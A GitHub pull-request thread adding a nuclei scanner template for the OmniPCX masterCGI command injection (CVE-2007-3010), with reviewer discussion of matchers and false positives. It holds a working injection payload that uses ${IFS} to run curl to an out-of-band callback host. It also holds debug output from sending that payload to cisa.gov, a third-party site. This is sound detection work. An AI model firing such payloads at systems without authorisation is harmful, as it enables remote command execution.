
CVE-2007-3010 #8387

Merged


king-alexander
Contributor

@king-alexander king-alexander commented Oct 13, 2023

Template / PR Information

This is a new template for a Known Exploited Vulnerability (#7549).

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@pussycat0x
Contributor

Hello @king-alexander I appreciate you sharing this template. If possible, could you also provide debug data? It would be very beneficial for our validation process.

@pussycat0x pussycat0x added the Status: In Progress This issue is being worked on, and has someone assigned. label Oct 23, 2023
@king-alexander
Contributor Author

Hello @king-alexander I appreciate you sharing this template. If possible, could you also provide debug data? It would be very beneficial for our validation process.

Sure! What type of debug data would be helpful?

@pussycat0x
Contributor

Hello @king-alexander, you can utilize the -debug flag to obtain debug data when executing a template.
Syntax:
./nuclei -u target -t CVE-2007-3010.yaml -debug

@king-alexander
Contributor Author

[DBG] [CVE-2007-3010] Dumped HTTP response https://cisa.gov/cgi-bin/masterCGI?ping=nomip&user=;curl${IFS}https://cleau9n70jngqfel87s0aefodk1mhh7o9.oast.live;

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 284
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 21 Nov 2023 13:22:49 GMT
Expires: Tue, 21 Nov 2023 13:22:49 GMT
Mime-Version: 1.0
Server: AkamaiGHost
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Reference-Error: 18.683b2f17.1700572969.4886ea5f

<HTML><HEAD>
<TITLE>Access Denied</TITLE>
</HEAD><BODY>
<H1>Access Denied</H1>

You don't have permission to access "http&#58;&#47;&#47;cisa&#46;gov&#47;cgi&#45;bin&#47;masterCGI&#63;" on this server.<P>
Reference&#32;&#35;18&#46;683b2f17&#46;1700572969&#46;4886ea5f

@pussycat0x
Contributor

Hi @king-alexander Thank you for providing debug data. I've made updates to the matchers. Could you please check if they work for you? Additionally, do you have any Shodan or FOFA dorks for this?

id: CVE-2007-3010

info:
  name: Alcatel-Lucent OmniPCX - Remote Command Execution
  author: king-alexander
  severity: high
  description: |
    The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
  impact: |
    Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
  remediation: |
    Update to supported versions that filter shell metacharacters in the "user" parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2007-3010
    - https://marc.info/?l=full-disclosure&m=119002152126755&w=2
  tags: alcatel,cve,cve2007,kev,rce

http:
  - method: GET
    path:
      # Spaces must be encoded with the internal field separator "${IFS}" to execute the command.
      - "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;curl${IFS}https://{{interactsh-url}};"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'Content-Type: text/html'

      - type: word
        part: body
        words:
          - "Access Denied"

      - type: status
        status:
          - 403

@king-alexander
Contributor Author

Thank you for the update! I don't think we want to match on 403 Forbidden response however. This vulnerability applies when the web interface is exposed. I don't have a Shodan or FOFA dork, but I imagine those would help us match on a true positive.
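
A small matcher evaluator, added here as an illustration and not part of this PR or of nuclei itself, that runs the matcher set from the review comment above against the Akamai 403 response from the debug output and against a constructed response from a hypothetical vulnerable host. The Response fields and the simplified matcher semantics (plain, case-sensitive substring search; no extractors or DSL) are assumptions made for the example.

```python
from dataclasses import dataclass

@dataclass
class Response:
    # Simplified view of one exchange; field names mirror the template's 'part' names.
    status: int
    header: str
    body: str
    interactsh_protocol: str = ""  # "http" when the out-of-band callback fired, else empty

def match_word(resp, part, words, condition="or"):
    # 'word' matcher: case-sensitive substring search in the named part.
    hits = [w in getattr(resp, part) for w in words]
    return all(hits) if condition == "and" else any(hits)

def evaluate(resp, matchers, matchers_condition="and"):
    # Combine per-matcher results with matchers-condition (and/or).
    results = []
    for m in matchers:
        if m["type"] == "word":
            results.append(match_word(resp, m["part"], m["words"], m.get("condition", "or")))
        elif m["type"] == "status":
            results.append(resp.status in m["status"])
        else:
            raise ValueError(f"unsupported matcher type: {m['type']}")
    return all(results) if matchers_condition == "and" else any(results)

# Matcher set exactly as posted in the review comment above.
REVIEWED_MATCHERS = [
    {"type": "word", "part": "interactsh_protocol", "words": ["http"]},
    {"type": "word", "part": "header", "words": ["Content-Type: text/html"]},
    {"type": "word", "part": "body", "words": ["Access Denied"]},
    {"type": "status", "status": [403]},
]
# Same set keeping only the out-of-band signal (the objection raised in the thread).
OOB_ONLY_MATCHERS = REVIEWED_MATCHERS[:1]
# Constructed responses: the Akamai 403 from the debug output (no callback), and a
# hypothetical vulnerable host answering 200 after the callback was received.
AKAMAI_403 = Response(403, "Content-Type: text/html\r\nServer: AkamaiGHost", "<H1>Access Denied</H1>")
VULNERABLE_200 = Response(200, "Content-Type: text/html", "<html>pong</html>", interactsh_protocol="http")

def verdicts():
    # (matcher set / response) -> would the template report a finding?
    return {
        "reviewed/akamai403": evaluate(AKAMAI_403, REVIEWED_MATCHERS),
        "reviewed/vulnerable200": evaluate(VULNERABLE_200, REVIEWED_MATCHERS),
        "oob_only/akamai403": evaluate(AKAMAI_403, OOB_ONLY_MATCHERS),
        "oob_only/vulnerable200": evaluate(VULNERABLE_200, OOB_ONLY_MATCHERS),
    }
```

With the 403/"Access Denied" matchers ANDed in, the reviewed set rejects the Akamai page only because the callback never fired, yet it also rejects a host that does execute the command and answers 200; without the interactsh matcher, the Akamai page alone would satisfy the remaining three.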

@DhiyaneshGeek DhiyaneshGeek self-requested a review February 6, 2024 06:47
@DhiyaneshGeek DhiyaneshGeek added Done Ready to merge and removed Status: In Progress This issue is being worked on, and has someone assigned. labels Feb 6, 2024
@DhiyaneshGeek
Member

Hi @king-alexander, I have managed to validate this successfully at my end.

Made some changes around the matcher to fix the false positive.

Thank you so much for sharing this template with the community and contributing to the template project 😄

@DhiyaneshGeek DhiyaneshGeek merged commit 7d9b23f into projectdiscovery:main Feb 6, 2024
2 checks passed
@king-alexander king-alexander deleted the template/CVE-2007-3010 branch February 6, 2024 22:38
@king-alexander
Contributor Author

@DhiyaneshGeek Thank you for taking the time to validate the template! I appreciate the work you've done to get this template merged 🙏
